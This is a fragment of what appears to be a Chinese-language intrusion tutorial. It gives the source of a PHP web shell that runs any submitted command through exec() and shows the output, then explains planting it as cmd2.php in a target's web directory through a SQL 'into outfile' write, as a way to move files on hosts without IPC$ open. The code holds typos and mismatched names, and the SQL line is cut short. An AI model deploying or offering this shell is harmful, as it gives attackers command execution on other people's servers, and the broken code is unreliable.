><body onload=document.form1.cmd.focus()>
<?if (isset($cmd)){$cmd=stripslashes($cmd);exec(\"$cmd>temp.dat\");}?>
<style type=\"text.css\">
<!\-\-.form1
{background:#ffffff;border-bottom:#666666 1px solid;border-left:#666666 1px solid;border-
right:#666666 1px solid;border-top:#666666 1px solid;color:#3c464f;font-size:9pt;clip:rect
();cursor:text;height:auto;width:auto;margin-top:0px;margin-right:0px;margin-
bottom:0px;margin-left:0px}
\-\-></style><p class=\"title\"> </p><form name=\"form1\" method=\"post\"
action=\"/cmd2.php\"><input type=\"text\" name\"cmd\" size=\"50\" class=\"form1
\"></from><form name=\"\form2" method=\"post\" action=\"\"><p><textarea name=\"text\"
cols=\"120\" row=\"50\" class=\"form1\"><?if
(isset($cmd)){readfile(\"temp.dat\");unlink(\"text.dat\");}?></textarea></p></form></body>
写入到你刚才看见的web实际目录中(要注意的问题是直接写到你刚才看到的路径中可并不能直接访问到
cmd2.php,你可以从里往外多试试)
select * form tmp into outfile <
关键词:没开IPC$主机上传下载思路